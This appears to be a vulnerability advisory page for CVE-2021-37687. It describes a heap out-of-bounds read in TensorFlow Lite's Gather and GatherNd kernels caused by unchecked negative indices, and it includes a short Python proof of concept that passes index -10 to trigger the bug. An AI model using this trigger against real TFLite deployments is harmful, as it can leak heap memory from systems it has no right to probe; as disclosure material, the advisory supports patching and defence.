CVE-2021-37687: Heap OOB in TFLite's `Gather*` implementations
(updated )
TFLite’s GatherNd
implementation does not support negative indices but there are no checks for this situation.
Hence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in indices
.
Similar issue exists in Gather
implementation.
import tensorflow as tf
import numpy as np
tf.compat.v1.disable_v2_behavior()
params = tf.compat.v1.placeholder(name="params", dtype=tf.int64, shape=(1,))
indices = tf.compat.v1.placeholder(name="indices", dtype=tf.int64, shape=())
out = tf.gather(params, indices, name='out')
with tf.compat.v1.Session() as sess:
converter = tf.compat.v1.lite.TFLiteConverter.from_session(sess, [params, indices], [out])
tflite_model = converter.convert()
interpreter = tf.lite.Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
params_data = np.reshape(np.array([1], dtype=np.int64), newshape=(1,))
indices_data = np.reshape(np.array(-10, dtype=np.int64), newshape=())
interpreter.set_tensor(input_details[0]['index'], params_data)
interpreter.set_tensor(input_details[1]['index'], indices_data)
interpreter.invoke()
References
- github.com/advisories/GHSA-jwf9-w5xm-f437
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-600.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-798.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-309.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather.cc
- github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather_nd.cc
- github.com/tensorflow/tensorflow/commit/bb6a0383ed553c286f87ca88c207f6774d5c4a8f
- github.com/tensorflow/tensorflow/commit/eb921122119a6b6e470ee98b89e65d721663179d
- github.com/tensorflow/tensorflow/security/advisories/GHSA-jwf9-w5xm-f437
- nvd.nist.gov/vuln/detail/CVE-2021-37687
Detect and mitigate CVE-2021-37687 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →